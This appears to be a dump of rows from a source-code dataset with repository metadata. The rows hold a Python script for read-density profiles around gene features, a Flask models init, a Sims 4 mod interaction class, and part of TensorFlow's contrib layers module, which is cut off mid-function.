hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f704f458109bda2f6012d3166ddc6ff6686bf0f4
| 12,306
|
py
|
Python
|
ABLIRC/bin/Basic/Distance2XXX/reads_or_peaks_distribution_relative2xxx.py
|
ablifedev/ABLIRC
|
875278b748a8e22ada2c76c3c76dbf970be4a6a4
|
[
"MIT"
] | 1
|
2020-02-25T13:08:20.000Z
|
2020-02-25T13:08:20.000Z
|
ABLIRC/bin/Basic/Distance2XXX/reads_or_peaks_distribution_relative2xxx.py
|
ablifedev/ABLIRC
|
875278b748a8e22ada2c76c3c76dbf970be4a6a4
|
[
"MIT"
] | 1
|
2020-02-25T13:16:03.000Z
|
2020-02-25T13:16:03.000Z
|
ABLIRC/bin/Basic/Distance2XXX/reads_or_peaks_distribution_relative2xxx.py
|
ablifedev/ABLIRC
|
875278b748a8e22ada2c76c3c76dbf970be4a6a4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
####################################################################################
### Copyright (C) 2015-2019 by ABLIFE
####################################################################################
####################################################################################
####################################################################################
# Date Version Author ChangeLog
#
#
#
#####################################################################################
"""
程序功能说明:
1.统计reads or peaks 相对于TTS,TSS,STARTCODON,STOPCODON的分布
程序设计思路:
利用gffutils和HTSeq包进行统计
"""
import re, os, sys, logging, time, datetime
from optparse import OptionParser, OptionGroup
reload(sys)
sys.setdefaultencoding('utf-8')
import subprocess
import threading
import gffutils
import HTSeq
import numpy
import multiprocessing
from matplotlib import pyplot
sys.path.insert(1, os.path.split(os.path.realpath(__file__))[0] + "/../../")
from ablib.utils.tools import *
from ablib.utils.distribution import *
if sys.version_info < (2, 7):
print("Python Version error: please use phthon2.7")
sys.exit(-1)
_version = 'v0.1'
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
def configOpt():
"""Init for option
"""
usage = 'Usage: %prog [option] [-h]'
p = OptionParser(usage)
##basic options
p.add_option(
'-g', '--gff', dest='gff', action='store',
type='string', help='gff file,do not have to provide it if db is exited')
p.add_option(
'-d', '--db', dest='db', default='gffdb', action='store',
type='string', help='the gff database file to create or use')
p.add_option(
'-b', '--bamorbed', dest='bamorbed', action='store',
type='string', help='bam or bed file, Important: the bamfile\'s suffix must be ".bam"')
p.add_option(
'-w', '--halfwinwidth', dest='halfwinwidth', default=1000, action='store',
type='int', help='halfwinwidth,default is 1000')
p.add_option(
'-p', '--postype', dest='postype', action='store',
type='string', help='gene position type:tss,tts,startcodon,stopcodon,intronstart,intronend')
p.add_option(
'-o', '--outfile', dest='outfile', default="distance2xxx_reads_density.txt", action='store',
type='string', help='gene expression file')
p.add_option(
'-n', '--samplename', dest='samplename', default='', action='store',
type='string', help='sample name,default is ""')
group = OptionGroup(p, "Preset options")
##preset options
group.add_option(
'-O', '--outDir', dest='outDir', default='./', action='store',
type='string', help='output directory', metavar="DIR")
group.add_option(
'-L', '--logDir', dest='logDir', default='', action='store',
type='string', help='log dir ,default is same as outDir')
group.add_option(
'-P', '--logPrefix', dest='logPrefix', default='', action='store',
type='string', help='log file prefix')
group.add_option(
'-E', '--email', dest='email', default='none', action='store',
type='string', help='email address, if you want get a email when this job is finished,default is no email',
metavar="EMAIL")
group.add_option(
'-Q', '--quiet', dest='quiet', default=True, action='store_true',
help='do not print messages to stdout')
group.add_option(
'-K', '--keepTemp', dest='keepTemp', default=False, action='store_true',
help='keep temp dir')
group.add_option(
'-T', '--test', dest='isTest', default=False, action='store_true',
help='run this program for test')
p.add_option_group(group)
if len(sys.argv) == 1:
p.print_help()
sys.exit(1)
opt, args = p.parse_args()
return (p, opt, args)
def listToString(x):
"""获得完整的命令
"""
rVal = ''
for a in x:
rVal += a + ' '
return rVal
opt_parser, opt, args = configOpt()
if not opt.postype:
opt_parser.error('Option -p must be assigned.\n')
if opt.logDir == "":
opt.logDir = opt.outDir + '/log/'
sample = ""
if opt.samplename != "":
sample = opt.samplename + '_'
if opt.outfile == 'distance2xxx_reads_density.txt':
opt.outfile = sample + 'distance2' + opt.postype + '_reads_density.txt'
intype = "bam"
match = re.search(r'\.bam$', opt.bamorbed)
if not match:
intype = "bed"
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
scriptPath = os.path.abspath(os.path.dirname(__file__)) # absolute script path
binPath = "/".join(scriptPath.split("/")[0:-2]) # absolute bin path
outPath = os.path.abspath(opt.outDir) # absolute output path
#os.mkdir(outPath) if not os.path.isdir(outPath) else None
os.system('mkdir -p ' + outPath)
logPath = os.path.abspath(opt.logDir)
#os.mkdir(logPath) if not os.path.isdir(logPath) else None
os.system('mkdir -p ' + logPath)
tempPath = outPath + '/temp/' # absolute bin path
# os.mkdir(tempPath) if not os.path.isdir(tempPath) else None
resultPath = outPath + '/result/'
# os.mkdir(resultPath) if not os.path.isdir(resultPath) else None
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
def initLogging(logFilename):
"""Init for logging
"""
logging.basicConfig(
level=logging.DEBUG,
format='[%(asctime)s : %(levelname)s] %(message)s',
datefmt='%y-%m-%d %H:%M',
filename=logFilename,
filemode='w')
if not opt.quiet:
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('[%(asctime)s : %(levelname)s] %(message)s', datefmt='%y-%m-%d %H:%M')
# tell the handler to use this format
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
dt = datetime.datetime.now()
logFile = logPath + '/' + opt.logPrefix + 'log.' + str(dt.strftime('%Y%m%d.%H%M%S.%f')) + '.txt'
initLogging(logFile)
logging.debug(sys.modules[__name__].__doc__)
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
logging.debug('Program version: %s' % _version)
logging.debug('Start the program with [%s]\n', listToString(sys.argv))
startTime = datetime.datetime.now()
logging.debug("计时器:Program start at %s" % startTime)
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
### S
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
### E
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
def main():
print("Main procedure start...")
if opt.gff:
db = gffutils.create_db(opt.gff, opt.db, merge_strategy="create_unique", verbose=False, force=True)
db = gffutils.FeatureDB(opt.db)
Watcher()
pool = multiprocessing.Pool(processes=15)
server = multiprocessing.Manager()
dis = server.dict()
for chr in db.seqids():
# if chr != "chr1":
# continue
if intype == "bam":
chr_dict = readBamHeader(opt.bamorbed)
if not chr in chr_dict:
continue
# print(chr)
dis[chr] = [0 for x in range(2 * opt.halfwinwidth)]
pool.apply_async(distributionToOnePointByChr,
args=(chr, opt.bamorbed, opt.db, opt.outfile, opt.postype, opt.halfwinwidth, dis))
pool.close()
pool.join()
d = dict(dis).copy()
server.shutdown()
profile = numpy.zeros(2 * opt.halfwinwidth, dtype='i')
for chr in sorted(d.keys()):
wincvg = numpy.fromiter(d[chr], dtype='i', count=2 * opt.halfwinwidth)
profile += wincvg
# pyplot.plot( numpy.arange( -opt.halfwinwidth, opt.halfwinwidth ), profile )
# pyplot.show()
os.chdir(opt.outDir)
fout = open(opt.outfile, 'w')
fout.writelines(
"+distance\tdensity\n")
n = 0
for i in range(-opt.halfwinwidth, opt.halfwinwidth):
fout.writelines(str(i) + '\t' + str(profile[n]) + '\n')
n += 1
fout.close()
#cmd = "cd " + outPath + "&& R --slave < /users/ablife/ablife-R/Line_single_ggplot2.r --args " + opt.outfile + " " + sample + 'distance2' + opt.postype + '_reads_density ./ \n'
cmd = "cd " + outPath + "&& Rscript " + binPath + "/plot/Line_single_ggplot2.r -f " + opt.outfile + " -t " + sample + 'distance2' + opt.postype + '_reads_density -n ' + sample + 'distance2' + opt.postype + '_reads_density -o ./'
os.system(cmd)
if __name__ == '__main__':
main()
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
if not opt.keepTemp:
os.system('rm -rf ' + tempPath)
logging.debug("Temp folder is deleted..")
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
logging.debug("Program ended")
currentTime = datetime.datetime.now()
runningTime = (currentTime - startTime).seconds # in seconds
logging.debug("计时器:Program start at %s" % startTime)
logging.debug("计时器:Program end at %s" % currentTime)
logging.debug("计时器:Program ran %.2d:%.2d:%.2d" % (runningTime / 3600, (runningTime % 3600) / 60, runningTime % 60))
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
if opt.email != "none":
run_cmd = listToString(sys.argv)
sendEmail(opt.email, str(startTime), str(currentTime), run_cmd, outPath)
logging.info("发送邮件通知到 %s" % opt.email)
# -----------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------
| 33.715068
| 232
| 0.42719
| true
| true
|
|
f704f4cd9c7fb1284f93ea1a887f87bdb1ce825e
| 408
|
py
|
Python
|
backend/api/models/__init__.py
|
Leundai/twanalyze
|
bfccd9de43fae78e1cbdc0a6695f1cf827a3282b
|
[
"Apache-2.0"
] | 4
|
2020-10-06T17:15:32.000Z
|
2021-06-04T06:07:44.000Z
|
backend/api/models/__init__.py
|
Leundai/twanalyze
|
bfccd9de43fae78e1cbdc0a6695f1cf827a3282b
|
[
"Apache-2.0"
] | 10
|
2020-10-06T18:23:43.000Z
|
2020-10-12T00:26:05.000Z
|
backend/api/models/__init__.py
|
Leundai/twanalyze
|
bfccd9de43fae78e1cbdc0a6695f1cf827a3282b
|
[
"Apache-2.0"
] | null | null | null |
# this file structure follows http://flask.pocoo.org/docs/1.0/patterns/appfactories/
# initializing db in api.models.base instead of in api.__init__.py
# to prevent circular dependencies
from .base import db
from .Email import Email
from .Person import Person
from .VideoInfo import VideoInfo
__all__ = ["db", "Email", "Person", "VideoInfo"]
# You must import all of the new Models you create to this page
| 34
| 84
| 0.767157
|
from .base import db
from .Email import Email
from .Person import Person
from .VideoInfo import VideoInfo
__all__ = ["db", "Email", "Person", "VideoInfo"]
| true
| true
|
f704f52a0332da8f345d14dd4fef2d97a4463857
| 4,181
|
py
|
Python
|
Scripts/sims4communitylib/classes/interactions/common_interaction_override_name.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 118
|
2019-08-31T04:33:18.000Z
|
2022-03-28T21:12:14.000Z
|
Scripts/sims4communitylib/classes/interactions/common_interaction_override_name.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 15
|
2019-12-05T01:29:46.000Z
|
2022-02-18T17:13:46.000Z
|
Scripts/sims4communitylib/classes/interactions/common_interaction_override_name.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 28
|
2019-09-07T04:11:05.000Z
|
2022-02-07T18:31:40.000Z
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any, Union
from interactions.base.interaction import Interaction
from interactions.context import InteractionContext
from protocolbuffers.Localization_pb2 import LocalizedString
from sims.sim import Sim
from sims4.utils import flexmethod
from sims4communitylib.logging.has_class_log import HasClassLog
from sims4communitylib.mod_support.mod_identity import CommonModIdentity
class CommonInteractionOverrideName(HasClassLog):
"""CommonInteractionOverrideName()
An inheritable class that provides a way to override the :func:`~get_name` function of :class:`.CommonInteraction`.
.. warning:: This class is to be used in conjunction with :class:`.CommonInteraction`. Inheriting from this class will do nothing for class that does not also inherit from :class:`.CommonInteraction`.
"""
# noinspection PyMissingOrEmptyDocstring
@classmethod
def get_mod_identity(cls) -> Union[CommonModIdentity, None]:
return None
def __init__(self) -> None:
super().__init__()
HasClassLog.__init__(self)
# noinspection PyMethodParameters,PyMissingOrEmptyDocstring
@flexmethod
def get_name(cls, inst: Interaction, target: Any=None, context: InteractionContext=None, **interaction_parameters) -> Union[LocalizedString, None]:
inst_or_cls = inst or cls
try:
context_inst_or_cls = context or inst_or_cls
interaction_sim = context_inst_or_cls.sim
interaction_target = target or context_inst_or_cls.target
cls.get_verbose_log().format_with_message(
'Creating display name.',
class_name=cls.__name__,
interaction_sim=interaction_sim,
interaction_target=interaction_target,
interaction=inst,
interaction_context=context
)
override_name = cls._create_display_name(
interaction_sim,
interaction_target,
interaction=inst,
interaction_context=context,
**interaction_parameters
)
if override_name is not None:
return override_name
except Exception as ex:
cls.get_log().error('An error occurred while running get_name of interaction {}'.format(cls.__name__), exception=ex)
return super(Interaction, inst_or_cls).get_name(target=target, context=context, **interaction_parameters)
# noinspection PyUnusedLocal
@classmethod
def _create_display_name(cls, interaction_sim: Sim, interaction_target: Any, interaction: Union[Interaction, None]=None, interaction_context: Union[InteractionContext, None]=None, **interaction_parameters) -> Union[LocalizedString, None]:
"""_create_display_name(interaction_sim, interaction_target, interaction=None, interaction_context=None, **interaction_parameters)
A hook that allows using a custom display name for an Interaction.
:param interaction_sim: The source Sim of the interaction.
:type interaction_sim: Sim
:param interaction_target: The target Object of the interaction.
:type interaction_target: Any
:param interaction: An instance of an interaction or None if no instance of the interaction is available. Default is None.
:type interaction: Union[Interaction, None], optional
:param interaction_context: The context of the interaction or None if no interaction context is available. Default is None.
:type interaction_context: Union[InteractionContext, None], optional
:param interaction_parameters: Extra interaction parameters.
:type interaction_parameters: Any
:return: A Localized String to display for the interaction or None if the original display name should be used.
:rtype: Union[LocalizedString, None]
"""
raise NotImplementedError()
| 48.057471
| 242
| 0.717771
|
from typing import Any, Union
from interactions.base.interaction import Interaction
from interactions.context import InteractionContext
from protocolbuffers.Localization_pb2 import LocalizedString
from sims.sim import Sim
from sims4.utils import flexmethod
from sims4communitylib.logging.has_class_log import HasClassLog
from sims4communitylib.mod_support.mod_identity import CommonModIdentity
class CommonInteractionOverrideName(HasClassLog):
@classmethod
def get_mod_identity(cls) -> Union[CommonModIdentity, None]:
return None
def __init__(self) -> None:
super().__init__()
HasClassLog.__init__(self)
@flexmethod
def get_name(cls, inst: Interaction, target: Any=None, context: InteractionContext=None, **interaction_parameters) -> Union[LocalizedString, None]:
inst_or_cls = inst or cls
try:
context_inst_or_cls = context or inst_or_cls
interaction_sim = context_inst_or_cls.sim
interaction_target = target or context_inst_or_cls.target
cls.get_verbose_log().format_with_message(
'Creating display name.',
class_name=cls.__name__,
interaction_sim=interaction_sim,
interaction_target=interaction_target,
interaction=inst,
interaction_context=context
)
override_name = cls._create_display_name(
interaction_sim,
interaction_target,
interaction=inst,
interaction_context=context,
**interaction_parameters
)
if override_name is not None:
return override_name
except Exception as ex:
cls.get_log().error('An error occurred while running get_name of interaction {}'.format(cls.__name__), exception=ex)
return super(Interaction, inst_or_cls).get_name(target=target, context=context, **interaction_parameters)
@classmethod
def _create_display_name(cls, interaction_sim: Sim, interaction_target: Any, interaction: Union[Interaction, None]=None, interaction_context: Union[InteractionContext, None]=None, **interaction_parameters) -> Union[LocalizedString, None]:
raise NotImplementedError()
| true
| true
|
f704f5d9631a52161bb607794d67acaf0b67e1cb
| 129,671
|
py
|
Python
|
tensorflow/contrib/layers/python/layers/layers.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-08T04:32:21.000Z
|
2017-09-08T04:32:21.000Z
|
tensorflow/contrib/layers/python/layers/layers.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/layers/python/layers/layers.py
|
drothlis/tensorflow
|
04c318b69c5b565436cfeeaab1cb7fd5419dde27
|
[
"Apache-2.0"
] | 1
|
2017-09-12T19:41:26.000Z
|
2017-09-12T19:41:26.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Higher level ops for building layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import six
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import convolutional as convolutional_layers
from tensorflow.python.layers import core as core_layers
from tensorflow.python.layers import normalization as normalization_layers
from tensorflow.python.layers import pooling as pooling_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training import moving_averages
from tensorflow.python.layers.maxout import maxout
# TODO(b/28426988): Replace legacy_* fns migrated from slim.
# TODO(b/28426988): Remove legacy_* when all uses have migrated to new API.
__all__ = ['avg_pool2d',
'avg_pool3d',
'batch_norm',
'bias_add',
'conv2d',
'conv3d',
'conv2d_in_plane',
'conv2d_transpose',
'conv3d_transpose',
'convolution',
'convolution2d',
'convolution2d_in_plane',
'convolution2d_transpose',
'convolution3d',
'convolution3d_transpose',
'dropout',
'elu',
'flatten',
'fully_connected',
'GDN',
'gdn',
'layer_norm',
'linear',
'pool',
'max_pool2d',
'max_pool3d',
'one_hot_encoding',
'relu',
'relu6',
'repeat',
'scale_gradient',
'separable_conv2d',
'separable_convolution2d',
'softmax',
'spatial_softmax',
'stack',
'unit_norm',
'legacy_fully_connected',
'legacy_linear',
'legacy_relu',
'maxout']
DATA_FORMAT_NCHW = 'NCHW'
DATA_FORMAT_NHWC = 'NHWC'
DATA_FORMAT_NCDHW = 'NCDHW'
DATA_FORMAT_NDHWC = 'NDHWC'
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
'').lower() in ('true', 't', '1')
@add_arg_scope
def avg_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NHWC,
outputs_collections=None,
scope=None):
"""Adds a 2D average pooling op.
It is assumed that the pooling is done per image but not in batch or channels.
Args:
inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
`data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
`data_format` is `NCHW`.
kernel_size: A list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: A list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding method, either 'VALID' or 'SAME'.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with ops.name_scope(scope, 'AvgPool2D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.AveragePooling2D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def avg_pool3d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NDHWC,
outputs_collections=None,
scope=None):
"""Adds a 3D average pooling op.
It is assumed that the pooling is done per image but not in batch or channels.
Args:
inputs: A 5-D tensor of shape `[batch_size, depth, height, width, channels]` if
`data_format` is `NDHWC`, and `[batch_size, channels, depth, height, width]` if
`data_format` is `NCDHW`.
kernel_size: A list of length 3: [kernel_depth, kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: A list of length 3: [stride_depth, stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding method, either 'VALID' or 'SAME'.
data_format: A string. `NDHWC` (default) and `NCDHW` are supported.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: If `data_format` is neither `NDHWC` nor `NCDHW`.
"""
if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
raise ValueError('data_format has to be either NCDHW or NDHWC.')
with ops.name_scope(scope, 'AvgPool3D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.AveragePooling3D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _fused_batch_norm(
inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
data_format=DATA_FORMAT_NHWC,
zero_debias_moving_mean=False,
scope=None):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Note: when training, the moving_mean and moving_variance need to be updated.
By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
need to be added as a dependency to the `train_op`. For example:
```python
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss)
```
One can set updates_collections=None to force the updates in place, but that
can have a speed penalty, especially in distributed settings.
Args:
inputs: A tensor with 2 or more dimensions, where the first dimension has
`batch_size`. The normalization is over all but the last dimension if
`data_format` is `NHWC` and the second dimension if `data_format` is
`NCHW`.
decay: Decay for the moving average. Reasonable values for `decay` are close
to 1.0, typically in the multiple-nines range: 0.999, 0.99, 0.9, etc.
Lower `decay` value (recommend trying `decay`=0.9) if model experiences
reasonably good training performance but poor validation and/or test
performance.
center: If True, add offset of `beta` to normalized tensor. If False,
`beta` is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: Small float added to variance to avoid dividing by zero.
activation_fn: Activation function, default set to None to skip it and
maintain a linear activation.
param_initializers: Optional initializers for beta, gamma, moving mean and
moving variance.
updates_collections: Collections to collect the update ops for computation.
The updates_ops need to be executed with the train_op.
If None, a control dependency would be added to make sure the updates are
computed in place.
is_training: Whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional collections for the variables.
outputs_collections: Collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
data_format: A string. `NHWC` (default) and `NCHW` are supported.
zero_debias_moving_mean: Use zero_debias for moving_mean.
scope: Optional scope for `variable_scope`.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If the rank of `inputs` is undefined.
ValueError: If the rank of `inputs` is neither 2 or 4.
ValueError: If rank or `C` dimension of `inputs` is undefined.
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with variable_scope.variable_scope(
scope, 'BatchNorm', [inputs], reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
original_shape = inputs.get_shape()
original_inputs = inputs
original_rank = original_shape.ndims
if original_rank is None:
raise ValueError('Inputs %s has undefined rank' % inputs.name)
elif original_rank not in [2, 4]:
raise ValueError('Inputs %s has unsupported rank.'
' Expected 2 or 4 but got %d' % (
inputs.name, original_rank))
if original_rank == 2:
channels = inputs.get_shape()[-1].value
if channels is None:
raise ValueError('`C` dimension must be known but is None')
new_shape = [-1, 1, 1, channels]
if data_format == DATA_FORMAT_NCHW:
new_shape = [-1, channels, 1, 1]
inputs = array_ops.reshape(inputs, new_shape)
inputs_shape = inputs.get_shape()
dtype = inputs.dtype.base_dtype
if data_format == DATA_FORMAT_NHWC:
params_shape = inputs_shape[-1:]
else:
params_shape = inputs_shape[1:2]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined `C` dimension %s.' %
(inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
trainable_beta = trainable and center
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
if not param_initializers:
param_initializers = {}
if center:
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
beta = variables.model_variable(
'beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable_beta)
else:
beta = array_ops.constant(0.0, shape=params_shape)
if scale:
gamma_collections = utils.get_variable_collections(
variables_collections, 'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
gamma = variables.model_variable(
'gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable)
else:
gamma = array_ops.constant(1.0, shape=params_shape)
# Create moving_mean and moving_variance variables and add them to the
# appropriate collections.
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
def _fused_batch_norm_training():
return nn.fused_batch_norm(
inputs, gamma, beta, epsilon=epsilon, data_format=data_format)
def _fused_batch_norm_inference():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=moving_mean,
variance=moving_variance,
epsilon=epsilon,
is_training=False,
data_format=data_format)
outputs, mean, variance = utils.smart_cond(is_training,
_fused_batch_norm_training,
_fused_batch_norm_inference)
# If `is_training` doesn't have a constant value, because it is a `Tensor`,
# a `Variable` or `Placeholder` then is_training_value will be None and
# `need_updates` will be true.
is_training_value = utils.constant_value(is_training)
need_updates = is_training_value is None or is_training_value
if need_updates:
if updates_collections is None:
no_updates = lambda: outputs
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
